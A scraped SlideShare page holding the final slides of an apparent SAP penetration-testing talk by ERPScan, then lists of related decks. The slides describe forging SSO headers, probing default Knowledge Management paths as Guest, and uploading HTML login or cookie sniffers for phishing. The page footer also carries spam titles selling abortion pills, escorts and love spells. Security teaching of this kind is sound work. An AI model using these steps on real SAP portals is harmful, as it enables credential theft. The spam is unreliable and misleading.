  according	
  to	
  Shodan	
  
•  ~200	
  Portals	
  in	
  the	
  world	
  according	
  to	
  Google	
  
	
  
149	
  
Portal	
  issues	
  
•  SAP	
  implements	
  SSO	
  using	
  the	
  Header	
  Variable	
  Login	
  Module	
  
	
  
150	
  
creden%als	
  
check	
  
okay	
  
cookie	
  
A}acker	
  
header_auth	
  
cookie	
  
Knowledge	
  Management	
  
•  One	
  of	
  Portal	
  modules	
  is	
  SAP	
  Knowledge	
  Management.	
  
•  KM	
  is	
  addi%onal	
  func%onality	
  
•  It	
  is	
  designed	
  to	
  aggregate	
  all	
  user	
  documents	
  and	
  create	
  a	
  
knowledge	
  base	
  
•  Like	
  Sharepoint	
  
•  An	
  a}acker	
  can:	
  
–  Get	
  read	
  access	
  to	
  cri%cal	
  documents	
  
–  Create	
  phishing	
  pages	
  which	
  will	
  steal	
  logins	
  and	
  passwords.	
  
151	
  
KM	
  Documents	
  
•  KM	
  by	
  default	
  can	
  be	
  found	
  here	
  /irj/go/km/naviga%on	
  
•  Some%mes	
  Guest	
  user	
  can	
  have	
  access	
  to	
  KM	
  
•  You	
  can	
  test	
  listed	
  folders:	
  
–  /irj/go/km/naviga%on/userhome/	
  
–  /irj/go/km/naviga%on/docs/	
  
–  /irj/go/km/naviga%on/documents/Public	
  Documents/	
  
–  /irj/go/km/naviga%on/Entry	
  Points/Public	
  Documents/	
  
152	
  
KM	
  Documents	
  
•  Some%mes	
  it	
  is	
  possible	
  to	
  put	
  documents	
  into	
  shared	
  folders	
  
•  Like	
  this	
  folder	
  /irj/go/km/docs/documents/Public	
  Documents/	
  
•  You	
  can	
  upload	
  HTML	
  file	
  with	
  login	
  sniffer	
  or	
  cookie	
  sniffer	
  
153	
  
SAP	
  Security	
  
154	
  
Ques)ons?	
  
We	
  devote	
  a<en)on	
  to	
  the	
  requirements	
  of	
  our	
  
customers	
  and	
  prospects,	
  and	
  constantly	
  improve	
  our	
  
product.	
  If	
  you	
  presume	
  that	
  our	
  scanner	
  lacks	
  a	
  
par)cular	
  func)on,	
  you	
  can	
  e-­‐mail	
  us	
  or	
  give	
  us	
  a	
  call.	
  We	
  
will	
  be	
  glad	
  to	
  consider	
  your	
  sugges)ons	
  for	
  the	
  next	
  
releases	
  or	
  monthly	
  updates.	
  
155	
  
web:	
  www.erpscan.com	
  
e-­‐mail:	
  info@erpscan.com,	
  sales@erpscan.com	
  
Conclusion	
  

More Related Content

What's hot

SAP Single Sign-On 2.0 Overview
SAP Single Sign-On 2.0 OverviewSAP Single Sign-On 2.0 Overview
SAP Single Sign-On 2.0 OverviewSAP Technology
 
Container Security
Container SecurityContainer Security
Container SecuritySalman Baset
 
Certified SOC Analyst
Certified SOC AnalystCertified SOC Analyst
Certified SOC AnalystSagarNegi10
 
Pentesting react native application for fun and profit - Abdullah
Pentesting react native application for fun and profit - AbdullahPentesting react native application for fun and profit - Abdullah
Pentesting react native application for fun and profit - Abdullahidsecconf
 
Security architecture frameworks
Security architecture frameworksSecurity architecture frameworks
Security architecture frameworksJohn Arnold
 
iOS-Application-Security-iAmPr3m
iOS-Application-Security-iAmPr3miOS-Application-Security-iAmPr3m
iOS-Application-Security-iAmPr3mPrem Kumar (OSCP)
 
100 Security Operation Center Tools.pdf
100 Security Operation Center Tools.pdf100 Security Operation Center Tools.pdf
100 Security Operation Center Tools.pdfMAHESHUMANATHGOPALAK
 
Veeam Backup & Replication Tips and Tricks
Veeam Backup & Replication Tips and TricksVeeam Backup & Replication Tips and Tricks
Veeam Backup & Replication Tips and TricksVeeam Software
 
Elastic SIEM (Endpoint Security)
Elastic SIEM (Endpoint Security)Elastic SIEM (Endpoint Security)
Elastic SIEM (Endpoint Security)Kangaroot
 
OpenStack Ironic - Bare Metal-as-a-Service
OpenStack Ironic - Bare Metal-as-a-ServiceOpenStack Ironic - Bare Metal-as-a-Service
OpenStack Ironic - Bare Metal-as-a-ServiceRamon Acedo Rodriguez
 
From SIEM to SOC: Crossing the Cybersecurity Chasm
From SIEM to SOC: Crossing the Cybersecurity ChasmFrom SIEM to SOC: Crossing the Cybersecurity Chasm
From SIEM to SOC: Crossing the Cybersecurity ChasmPriyanka Aash
 
Enterprise Security Architecture Design
Enterprise Security Architecture DesignEnterprise Security Architecture Design
Enterprise Security Architecture DesignPriyanka Aash
 
Full Isolation in Multi-Tenant SAAS with Kubernetes & Istio
Full Isolation in Multi-Tenant SAAS with Kubernetes & IstioFull Isolation in Multi-Tenant SAAS with Kubernetes & Istio
Full Isolation in Multi-Tenant SAAS with Kubernetes & IstioDevOps Indonesia
 
Alphorm.com Microsoft AZURE
Alphorm.com Microsoft AZUREAlphorm.com Microsoft AZURE
Alphorm.com Microsoft AZUREAlphorm
 
Modern Requirements and Solutions for Privileged Access Management (PAM)
Modern Requirements and Solutions for Privileged Access Management (PAM)Modern Requirements and Solutions for Privileged Access Management (PAM)
Modern Requirements and Solutions for Privileged Access Management (PAM)Enterprise Management Associates
 
Finding Your Way in Container Security
Finding Your Way in Container SecurityFinding Your Way in Container Security
Finding Your Way in Container SecurityKsenia Peguero
 

What's hot (20)

SAP Single Sign-On 2.0 Overview
SAP Single Sign-On 2.0 OverviewSAP Single Sign-On 2.0 Overview
SAP Single Sign-On 2.0 Overview
 
Container Security
Container SecurityContainer Security
Container Security
 
CLOUD NATIVE SECURITY
CLOUD NATIVE SECURITYCLOUD NATIVE SECURITY
CLOUD NATIVE SECURITY
 
Certified SOC Analyst
Certified SOC AnalystCertified SOC Analyst
Certified SOC Analyst
 
Pentesting react native application for fun and profit - Abdullah
Pentesting react native application for fun and profit - AbdullahPentesting react native application for fun and profit - Abdullah
Pentesting react native application for fun and profit - Abdullah
 
Security architecture frameworks
Security architecture frameworksSecurity architecture frameworks
Security architecture frameworks
 
iOS-Application-Security-iAmPr3m
iOS-Application-Security-iAmPr3miOS-Application-Security-iAmPr3m
iOS-Application-Security-iAmPr3m
 
100 Security Operation Center Tools.pdf
100 Security Operation Center Tools.pdf100 Security Operation Center Tools.pdf
100 Security Operation Center Tools.pdf
 
Veeam Backup & Replication Tips and Tricks
Veeam Backup & Replication Tips and TricksVeeam Backup & Replication Tips and Tricks
Veeam Backup & Replication Tips and Tricks
 
Elastic SIEM (Endpoint Security)
Elastic SIEM (Endpoint Security)Elastic SIEM (Endpoint Security)
Elastic SIEM (Endpoint Security)
 
OpenStack Ironic - Bare Metal-as-a-Service
OpenStack Ironic - Bare Metal-as-a-ServiceOpenStack Ironic - Bare Metal-as-a-Service
OpenStack Ironic - Bare Metal-as-a-Service
 
From SIEM to SOC: Crossing the Cybersecurity Chasm
From SIEM to SOC: Crossing the Cybersecurity ChasmFrom SIEM to SOC: Crossing the Cybersecurity Chasm
From SIEM to SOC: Crossing the Cybersecurity Chasm
 
iOS Application Exploitation
iOS Application ExploitationiOS Application Exploitation
iOS Application Exploitation
 
Advanced Container Security
Advanced Container Security Advanced Container Security
Advanced Container Security
 
SABSA overview
SABSA overviewSABSA overview
SABSA overview
 
Enterprise Security Architecture Design
Enterprise Security Architecture DesignEnterprise Security Architecture Design
Enterprise Security Architecture Design
 
Full Isolation in Multi-Tenant SAAS with Kubernetes & Istio
Full Isolation in Multi-Tenant SAAS with Kubernetes & IstioFull Isolation in Multi-Tenant SAAS with Kubernetes & Istio
Full Isolation in Multi-Tenant SAAS with Kubernetes & Istio
 
Alphorm.com Microsoft AZURE
Alphorm.com Microsoft AZUREAlphorm.com Microsoft AZURE
Alphorm.com Microsoft AZURE
 
Modern Requirements and Solutions for Privileged Access Management (PAM)
Modern Requirements and Solutions for Privileged Access Management (PAM)Modern Requirements and Solutions for Privileged Access Management (PAM)
Modern Requirements and Solutions for Privileged Access Management (PAM)
 
Finding Your Way in Container Security
Finding Your Way in Container SecurityFinding Your Way in Container Security
Finding Your Way in Container Security
 

Viewers also liked

Penetration Testing SAP Systems
Penetration Testing SAP SystemsPenetration Testing SAP Systems
Penetration Testing SAP SystemsOnapsis Inc.
 
Attacking SAP users with sapsploit
Attacking SAP users with sapsploit Attacking SAP users with sapsploit
Attacking SAP users with sapsploit ERPScan
 
5 real ways to destroy business by breaking SAP applications
5 real ways to destroy business by breaking SAP applications5 real ways to destroy business by breaking SAP applications
5 real ways to destroy business by breaking SAP applicationsERPScan
 
Cyber-attacks to SAP Systems
Cyber-attacks to SAP SystemsCyber-attacks to SAP Systems
Cyber-attacks to SAP SystemsOnapsis Inc.
 
If I want a perfect cyberweapon, I'll target ERP - second edition
If I want a perfect cyberweapon, I'll target ERP - second editionIf I want a perfect cyberweapon, I'll target ERP - second edition
If I want a perfect cyberweapon, I'll target ERP - second editionERPScan
 
If I want a perfect cyberweapon, I'll target ERP
If I want a perfect cyberweapon, I'll target ERPIf I want a perfect cyberweapon, I'll target ERP
If I want a perfect cyberweapon, I'll target ERPERPScan
 
Forgotten world - Corporate Business Application Systems
Forgotten world - Corporate Business Application SystemsForgotten world - Corporate Business Application Systems
Forgotten world - Corporate Business Application SystemsERPScan
 
SAP SDM Hacking
SAP SDM HackingSAP SDM Hacking
SAP SDM HackingERPScan
 
Assessing and Securing SAP Solutions
Assessing and Securing SAP SolutionsAssessing and Securing SAP Solutions
Assessing and Securing SAP SolutionsERPScan
 
SSRF vs. Business-critical applications. Part 2. New vectors and connect-back...
SSRF vs. Business-critical applications. Part 2. New vectors and connect-back...SSRF vs. Business-critical applications. Part 2. New vectors and connect-back...
SSRF vs. Business-critical applications. Part 2. New vectors and connect-back...ERPScan
 
Business breakdown vulnerabilities in ERP via ICS and ICS via ERP
Business breakdown vulnerabilities in ERP via ICS and ICS via ERPBusiness breakdown vulnerabilities in ERP via ICS and ICS via ERP
Business breakdown vulnerabilities in ERP via ICS and ICS via ERPERPScan
 
Breaking, forensicating and anti-forensicating SAP Portal and J2EE Engine
Breaking, forensicating and anti-forensicating SAP Portal and J2EE EngineBreaking, forensicating and anti-forensicating SAP Portal and J2EE Engine
Breaking, forensicating and anti-forensicating SAP Portal and J2EE EngineERPScan
 
SAP Business Objects Attacks
SAP Business Objects AttacksSAP Business Objects Attacks
SAP Business Objects AttacksOnapsis Inc.
 
Top 10 most interesting vulnerabilities and attacks in SAP
Top 10 most interesting vulnerabilities and attacks in SAPTop 10 most interesting vulnerabilities and attacks in SAP
Top 10 most interesting vulnerabilities and attacks in SAPERPScan
 
SAP portal: breaking and forensicating
SAP portal: breaking and forensicating SAP portal: breaking and forensicating
SAP portal: breaking and forensicating ERPScan
 
Breaking SAP portal (HashDays)
Breaking SAP portal (HashDays)Breaking SAP portal (HashDays)
Breaking SAP portal (HashDays)ERPScan
 
The latest changes to SAP cybersecurity landscape
The latest changes to SAP cybersecurity landscapeThe latest changes to SAP cybersecurity landscape
The latest changes to SAP cybersecurity landscapeERPScan
 
SAP security made easy
SAP security made easySAP security made easy
SAP security made easyERPScan
 
Practical pentesting of ERPs and business applications
Practical pentesting of ERPs and business applicationsPractical pentesting of ERPs and business applications
Practical pentesting of ERPs and business applicationsERPScan
 

Viewers also liked (20)

Penetration Testing SAP Systems
Penetration Testing SAP SystemsPenetration Testing SAP Systems
Penetration Testing SAP Systems
 
Attacking SAP users with sapsploit
Attacking SAP users with sapsploit Attacking SAP users with sapsploit
Attacking SAP users with sapsploit
 
5 real ways to destroy business by breaking SAP applications
5 real ways to destroy business by breaking SAP applications5 real ways to destroy business by breaking SAP applications
5 real ways to destroy business by breaking SAP applications
 
Cyber-attacks to SAP Systems
Cyber-attacks to SAP SystemsCyber-attacks to SAP Systems
Cyber-attacks to SAP Systems
 
If I want a perfect cyberweapon, I'll target ERP - second edition
If I want a perfect cyberweapon, I'll target ERP - second editionIf I want a perfect cyberweapon, I'll target ERP - second edition
If I want a perfect cyberweapon, I'll target ERP - second edition
 
If I want a perfect cyberweapon, I'll target ERP
If I want a perfect cyberweapon, I'll target ERPIf I want a perfect cyberweapon, I'll target ERP
If I want a perfect cyberweapon, I'll target ERP
 
Forgotten world - Corporate Business Application Systems
Forgotten world - Corporate Business Application SystemsForgotten world - Corporate Business Application Systems
Forgotten world - Corporate Business Application Systems
 
SAP SDM Hacking
SAP SDM HackingSAP SDM Hacking
SAP SDM Hacking
 
Assessing and Securing SAP Solutions
Assessing and Securing SAP SolutionsAssessing and Securing SAP Solutions
Assessing and Securing SAP Solutions
 
SSRF vs. Business-critical applications. Part 2. New vectors and connect-back...
SSRF vs. Business-critical applications. Part 2. New vectors and connect-back...SSRF vs. Business-critical applications. Part 2. New vectors and connect-back...
SSRF vs. Business-critical applications. Part 2. New vectors and connect-back...
 
Business breakdown vulnerabilities in ERP via ICS and ICS via ERP
Business breakdown vulnerabilities in ERP via ICS and ICS via ERPBusiness breakdown vulnerabilities in ERP via ICS and ICS via ERP
Business breakdown vulnerabilities in ERP via ICS and ICS via ERP
 
Breaking, forensicating and anti-forensicating SAP Portal and J2EE Engine
Breaking, forensicating and anti-forensicating SAP Portal and J2EE EngineBreaking, forensicating and anti-forensicating SAP Portal and J2EE Engine
Breaking, forensicating and anti-forensicating SAP Portal and J2EE Engine
 
Sap security – thinking with a hacker’s hat
Sap security – thinking with a hacker’s hatSap security – thinking with a hacker’s hat
Sap security – thinking with a hacker’s hat
 
SAP Business Objects Attacks
SAP Business Objects AttacksSAP Business Objects Attacks
SAP Business Objects Attacks
 
Top 10 most interesting vulnerabilities and attacks in SAP
Top 10 most interesting vulnerabilities and attacks in SAPTop 10 most interesting vulnerabilities and attacks in SAP
Top 10 most interesting vulnerabilities and attacks in SAP
 
SAP portal: breaking and forensicating
SAP portal: breaking and forensicating SAP portal: breaking and forensicating
SAP portal: breaking and forensicating
 
Breaking SAP portal (HashDays)
Breaking SAP portal (HashDays)Breaking SAP portal (HashDays)
Breaking SAP portal (HashDays)
 
The latest changes to SAP cybersecurity landscape
The latest changes to SAP cybersecurity landscapeThe latest changes to SAP cybersecurity landscape
The latest changes to SAP cybersecurity landscape
 
SAP security made easy
SAP security made easySAP security made easy
SAP security made easy
 
Practical pentesting of ERPs and business applications
Practical pentesting of ERPs and business applicationsPractical pentesting of ERPs and business applications
Practical pentesting of ERPs and business applications
 

Similar to Practical SAP pentesting (B-Sides San Paulo)

Implementing SAP security in 5 steps
Implementing SAP security in 5 stepsImplementing SAP security in 5 steps
Implementing SAP security in 5 stepsERPScan
 
Assess and monitor SAP security
Assess and monitor SAP securityAssess and monitor SAP security
Assess and monitor SAP securityERPScan
 
EAS-SEC Project
EAS-SEC ProjectEAS-SEC Project
EAS-SEC ProjectERPScan
 
EAS-SEC: Framework for securing business applications
EAS-SEC: Framework for securing business applicationsEAS-SEC: Framework for securing business applications
EAS-SEC: Framework for securing business applicationsERPScan
 
SAP security landscape. How to protect(hack) your(their) big business
SAP security landscape. How to protect(hack) your(their) big businessSAP security landscape. How to protect(hack) your(their) big business
SAP security landscape. How to protect(hack) your(their) big businessERPScan
 
ERP Security. Myths, Problems, Solutions
ERP Security. Myths, Problems, SolutionsERP Security. Myths, Problems, Solutions
ERP Security. Myths, Problems, SolutionsERPScan
 
Attacks Based on Security Configurations
Attacks Based on Security ConfigurationsAttacks Based on Security Configurations
Attacks Based on Security ConfigurationsOnapsis Inc.
 
What CISOs should know about SAP security
What CISOs should know about SAP securityWhat CISOs should know about SAP security
What CISOs should know about SAP securityERPScan
 
SAP Forensics Detecting White Collar Cyber-crime
SAP Forensics Detecting White Collar Cyber-crimeSAP Forensics Detecting White Collar Cyber-crime
SAP Forensics Detecting White Collar Cyber-crimeOnapsis Inc.
 
Accelerate2022-Solving the SAP Security Gap through Application-aware Network...
Accelerate2022-Solving the SAP Security Gap through Application-aware Network...Accelerate2022-Solving the SAP Security Gap through Application-aware Network...
Accelerate2022-Solving the SAP Security Gap through Application-aware Network...PeterSmetny1
 
Onapsis SAP Forensics: Detecting White-Collar Cyber Crime with SAP Forensics
Onapsis SAP Forensics: Detecting White-Collar Cyber Crime with SAP ForensicsOnapsis SAP Forensics: Detecting White-Collar Cyber Crime with SAP Forensics
Onapsis SAP Forensics: Detecting White-Collar Cyber Crime with SAP ForensicsOnapsis Inc.
 
Onapsis SAP Backdoors
Onapsis SAP BackdoorsOnapsis SAP Backdoors
Onapsis SAP BackdoorsOnapsis Inc.
 
SAP Inside Track Frankfurt 2018 #Sitfra 2018
SAP Inside Track Frankfurt 2018 #Sitfra 2018SAP Inside Track Frankfurt 2018 #Sitfra 2018
SAP Inside Track Frankfurt 2018 #Sitfra 2018jvandevis
 
How to assess the risks in your SAP systems at the push of a button
How to assess the risks in your SAP systems at the push of a buttonHow to assess the risks in your SAP systems at the push of a button
How to assess the risks in your SAP systems at the push of a buttonVirtual Forge
 
Exploiting Critical Attack Vectors to Gain Control of SAP Systems
Exploiting Critical Attack Vectors to Gain Control of SAP SystemsExploiting Critical Attack Vectors to Gain Control of SAP Systems
Exploiting Critical Attack Vectors to Gain Control of SAP SystemsOnapsis Inc.
 
Best Practice Guide Security: How to check your SAP systems for security. [We...
Best Practice Guide Security: How to check your SAP systems for security. [We...Best Practice Guide Security: How to check your SAP systems for security. [We...
Best Practice Guide Security: How to check your SAP systems for security. [We...akquinet enterprise solutions GmbH
 
CONFidence 2014: Dimitriy Chastuhin: All your sap p@$$w0яd z belong to us
CONFidence 2014: Dimitriy Chastuhin:  All your sap p@$$w0яd z belong to usCONFidence 2014: Dimitriy Chastuhin:  All your sap p@$$w0яd z belong to us
CONFidence 2014: Dimitriy Chastuhin: All your sap p@$$w0яd z belong to usPROIDEA
 

Similar to Practical SAP pentesting (B-Sides San Paulo) (20)

Implementing SAP security in 5 steps
Implementing SAP security in 5 stepsImplementing SAP security in 5 steps
Implementing SAP security in 5 steps
 
Assess and monitor SAP security
Assess and monitor SAP securityAssess and monitor SAP security
Assess and monitor SAP security
 
EAS-SEC Project
EAS-SEC ProjectEAS-SEC Project
EAS-SEC Project
 
EAS-SEC: Framework for securing business applications
EAS-SEC: Framework for securing business applicationsEAS-SEC: Framework for securing business applications
EAS-SEC: Framework for securing business applications
 
SAP security landscape. How to protect(hack) your(their) big business
SAP security landscape. How to protect(hack) your(their) big businessSAP security landscape. How to protect(hack) your(their) big business
SAP security landscape. How to protect(hack) your(their) big business
 
ERP Security. Myths, Problems, Solutions
ERP Security. Myths, Problems, SolutionsERP Security. Myths, Problems, Solutions
ERP Security. Myths, Problems, Solutions
 
An easy way into your sap systems v3.0
An easy way into your sap systems v3.0An easy way into your sap systems v3.0
An easy way into your sap systems v3.0
 
Attacks Based on Security Configurations
Attacks Based on Security ConfigurationsAttacks Based on Security Configurations
Attacks Based on Security Configurations
 
SAST Code Security Advisor for SAP [Webinar]
SAST Code Security Advisor for SAP [Webinar]SAST Code Security Advisor for SAP [Webinar]
SAST Code Security Advisor for SAP [Webinar]
 
What CISOs should know about SAP security
What CISOs should know about SAP securityWhat CISOs should know about SAP security
What CISOs should know about SAP security
 
SAP Forensics Detecting White Collar Cyber-crime
SAP Forensics Detecting White Collar Cyber-crimeSAP Forensics Detecting White Collar Cyber-crime
SAP Forensics Detecting White Collar Cyber-crime
 
Accelerate2022-Solving the SAP Security Gap through Application-aware Network...
Accelerate2022-Solving the SAP Security Gap through Application-aware Network...Accelerate2022-Solving the SAP Security Gap through Application-aware Network...
Accelerate2022-Solving the SAP Security Gap through Application-aware Network...
 
Onapsis SAP Forensics: Detecting White-Collar Cyber Crime with SAP Forensics
Onapsis SAP Forensics: Detecting White-Collar Cyber Crime with SAP ForensicsOnapsis SAP Forensics: Detecting White-Collar Cyber Crime with SAP Forensics
Onapsis SAP Forensics: Detecting White-Collar Cyber Crime with SAP Forensics
 
Onapsis SAP Backdoors
Onapsis SAP BackdoorsOnapsis SAP Backdoors
Onapsis SAP Backdoors
 
SAP Inside Track Frankfurt 2018 #Sitfra 2018
SAP Inside Track Frankfurt 2018 #Sitfra 2018SAP Inside Track Frankfurt 2018 #Sitfra 2018
SAP Inside Track Frankfurt 2018 #Sitfra 2018
 
SAST Managed Services for SAP [Webinar]
SAST Managed Services for SAP [Webinar]SAST Managed Services for SAP [Webinar]
SAST Managed Services for SAP [Webinar]
 
How to assess the risks in your SAP systems at the push of a button
How to assess the risks in your SAP systems at the push of a buttonHow to assess the risks in your SAP systems at the push of a button
How to assess the risks in your SAP systems at the push of a button
 
Exploiting Critical Attack Vectors to Gain Control of SAP Systems
Exploiting Critical Attack Vectors to Gain Control of SAP SystemsExploiting Critical Attack Vectors to Gain Control of SAP Systems
Exploiting Critical Attack Vectors to Gain Control of SAP Systems
 
Best Practice Guide Security: How to check your SAP systems for security. [We...
Best Practice Guide Security: How to check your SAP systems for security. [We...Best Practice Guide Security: How to check your SAP systems for security. [We...
Best Practice Guide Security: How to check your SAP systems for security. [We...
 
CONFidence 2014: Dimitriy Chastuhin: All your sap p@$$w0яd z belong to us
CONFidence 2014: Dimitriy Chastuhin:  All your sap p@$$w0яd z belong to usCONFidence 2014: Dimitriy Chastuhin:  All your sap p@$$w0яd z belong to us
CONFidence 2014: Dimitriy Chastuhin: All your sap p@$$w0яd z belong to us
 

More from ERPScan

Attacking SAP Mobile
Attacking SAP MobileAttacking SAP Mobile
Attacking SAP MobileERPScan
 
Chinese attack on USIS exploiting SAP vulnerability. Detailed review and comm...
Chinese attack on USIS exploiting SAP vulnerability. Detailed review and comm...Chinese attack on USIS exploiting SAP vulnerability. Detailed review and comm...
Chinese attack on USIS exploiting SAP vulnerability. Detailed review and comm...ERPScan
 
Oracle PeopleSoft applications are under attacks (Hack in Paris)
Oracle PeopleSoft applications are under attacks (Hack in Paris)Oracle PeopleSoft applications are under attacks (Hack in Paris)
Oracle PeopleSoft applications are under attacks (Hack in Paris)ERPScan
 
Oracle PeopleSoft applications are under attack (HITB AMS)
Oracle PeopleSoft applications are under attack (HITB AMS)Oracle PeopleSoft applications are under attack (HITB AMS)
Oracle PeopleSoft applications are under attack (HITB AMS)ERPScan
 
13 real ways to destroy business by breaking company’s SAP applications
13 real ways to destroy business by breaking company’s SAP applications13 real ways to destroy business by breaking company’s SAP applications
13 real ways to destroy business by breaking company’s SAP applicationsERPScan
 
Injecting evil code in your SAP J2EE systems. Security of SAP Software Deploy...
Injecting evil code in your SAP J2EE systems. Security of SAP Software Deploy...Injecting evil code in your SAP J2EE systems. Security of SAP Software Deploy...
Injecting evil code in your SAP J2EE systems. Security of SAP Software Deploy...ERPScan
 
Securing SAP in 5 steps
Securing SAP in 5 stepsSecuring SAP in 5 steps
Securing SAP in 5 stepsERPScan
 
With big data comes big responsibility
With big data comes big responsibilityWith big data comes big responsibility
With big data comes big responsibilityERPScan
 
SAP security in figures
SAP security in figuresSAP security in figures
SAP security in figuresERPScan
 
Breaking SAP portal (DeepSec)
Breaking SAP portal (DeepSec)Breaking SAP portal (DeepSec)
Breaking SAP portal (DeepSec)ERPScan
 

More from ERPScan (10)

Attacking SAP Mobile
Attacking SAP MobileAttacking SAP Mobile
Attacking SAP Mobile
 
Chinese attack on USIS exploiting SAP vulnerability. Detailed review and comm...
Chinese attack on USIS exploiting SAP vulnerability. Detailed review and comm...Chinese attack on USIS exploiting SAP vulnerability. Detailed review and comm...
Chinese attack on USIS exploiting SAP vulnerability. Detailed review and comm...
 
Oracle PeopleSoft applications are under attacks (Hack in Paris)
Oracle PeopleSoft applications are under attacks (Hack in Paris)Oracle PeopleSoft applications are under attacks (Hack in Paris)
Oracle PeopleSoft applications are under attacks (Hack in Paris)
 
Oracle PeopleSoft applications are under attack (HITB AMS)
Oracle PeopleSoft applications are under attack (HITB AMS)Oracle PeopleSoft applications are under attack (HITB AMS)
Oracle PeopleSoft applications are under attack (HITB AMS)
 
13 real ways to destroy business by breaking company’s SAP applications
13 real ways to destroy business by breaking company’s SAP applications13 real ways to destroy business by breaking company’s SAP applications
13 real ways to destroy business by breaking company’s SAP applications
 
Injecting evil code in your SAP J2EE systems. Security of SAP Software Deploy...
Injecting evil code in your SAP J2EE systems. Security of SAP Software Deploy...Injecting evil code in your SAP J2EE systems. Security of SAP Software Deploy...
Injecting evil code in your SAP J2EE systems. Security of SAP Software Deploy...
 
Securing SAP in 5 steps
Securing SAP in 5 stepsSecuring SAP in 5 steps
Securing SAP in 5 steps
 
With big data comes big responsibility
With big data comes big responsibilityWith big data comes big responsibility
With big data comes big responsibility
 
SAP security in figures
SAP security in figuresSAP security in figures
SAP security in figures
 
Breaking SAP portal (DeepSec)
Breaking SAP portal (DeepSec)Breaking SAP portal (DeepSec)
Breaking SAP portal (DeepSec)
 

Recently uploaded

TECUNIQUE: Success Stories: IT Service provider
TECUNIQUE: Success Stories: IT Service providerTECUNIQUE: Success Stories: IT Service provider
TECUNIQUE: Success Stories: IT Service providermohitmore19
 
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...panagenda
 
%in Bahrain+277-882-255-28 abortion pills for sale in Bahrain
%in Bahrain+277-882-255-28 abortion pills for sale in Bahrain%in Bahrain+277-882-255-28 abortion pills for sale in Bahrain
%in Bahrain+277-882-255-28 abortion pills for sale in Bahrainmasabamasaba
 
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️Delhi Call girls
 
Define the academic and professional writing..pdf
Define the academic and professional writing..pdfDefine the academic and professional writing..pdf
Define the academic and professional writing..pdfPearlKirahMaeRagusta1
 
SHRMPro HRMS Software Solutions Presentation
SHRMPro HRMS Software Solutions PresentationSHRMPro HRMS Software Solutions Presentation
SHRMPro HRMS Software Solutions PresentationShrmpro
 
%+27788225528 love spells in Boston Psychic Readings, Attraction spells,Bring...
%+27788225528 love spells in Boston Psychic Readings, Attraction spells,Bring...%+27788225528 love spells in Boston Psychic Readings, Attraction spells,Bring...
%+27788225528 love spells in Boston Psychic Readings, Attraction spells,Bring...masabamasaba
 
introduction-to-automotive Andoid os-csimmonds-ndctechtown-2021.pdf
introduction-to-automotive Andoid os-csimmonds-ndctechtown-2021.pdfintroduction-to-automotive Andoid os-csimmonds-ndctechtown-2021.pdf
introduction-to-automotive Andoid os-csimmonds-ndctechtown-2021.pdfVishalKumarJha10
 
The Ultimate Test Automation Guide_ Best Practices and Tips.pdf
The Ultimate Test Automation Guide_ Best Practices and Tips.pdfThe Ultimate Test Automation Guide_ Best Practices and Tips.pdf
The Ultimate Test Automation Guide_ Best Practices and Tips.pdfkalichargn70th171
 
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️Delhi Call girls
 
Introducing Microsoft’s new Enterprise Work Management (EWM) Solution
Introducing Microsoft’s new Enterprise Work Management (EWM) SolutionIntroducing Microsoft’s new Enterprise Work Management (EWM) Solution
Introducing Microsoft’s new Enterprise Work Management (EWM) SolutionOnePlan Solutions
 
%in ivory park+277-882-255-28 abortion pills for sale in ivory park
%in ivory park+277-882-255-28 abortion pills for sale in ivory park %in ivory park+277-882-255-28 abortion pills for sale in ivory park
%in ivory park+277-882-255-28 abortion pills for sale in ivory park masabamasaba
 
Crypto Cloud Review - How To Earn Up To $500 Per DAY Of Bitcoin 100% On AutoP...
Crypto Cloud Review - How To Earn Up To $500 Per DAY Of Bitcoin 100% On AutoP...Crypto Cloud Review - How To Earn Up To $500 Per DAY Of Bitcoin 100% On AutoP...
Crypto Cloud Review - How To Earn Up To $500 Per DAY Of Bitcoin 100% On AutoP...SelfMade bd
 
AI & Machine Learning Presentation Template
AI & Machine Learning Presentation TemplateAI & Machine Learning Presentation Template
AI & Machine Learning Presentation TemplatePresentation.STUDIO
 
%in tembisa+277-882-255-28 abortion pills for sale in tembisa
%in tembisa+277-882-255-28 abortion pills for sale in tembisa%in tembisa+277-882-255-28 abortion pills for sale in tembisa
%in tembisa+277-882-255-28 abortion pills for sale in tembisamasabamasaba
 
%in Hazyview+277-882-255-28 abortion pills for sale in Hazyview
%in Hazyview+277-882-255-28 abortion pills for sale in Hazyview%in Hazyview+277-882-255-28 abortion pills for sale in Hazyview
%in Hazyview+277-882-255-28 abortion pills for sale in Hazyviewmasabamasaba
 
The Top App Development Trends Shaping the Industry in 2024-25 .pdf
The Top App Development Trends Shaping the Industry in 2024-25 .pdfThe Top App Development Trends Shaping the Industry in 2024-25 .pdf
The Top App Development Trends Shaping the Industry in 2024-25 .pdfayushiqss
 
AI Mastery 201: Elevating Your Workflow with Advanced LLM Techniques
AI Mastery 201: Elevating Your Workflow with Advanced LLM TechniquesAI Mastery 201: Elevating Your Workflow with Advanced LLM Techniques
AI Mastery 201: Elevating Your Workflow with Advanced LLM TechniquesVictorSzoltysek
 
+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...
+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...
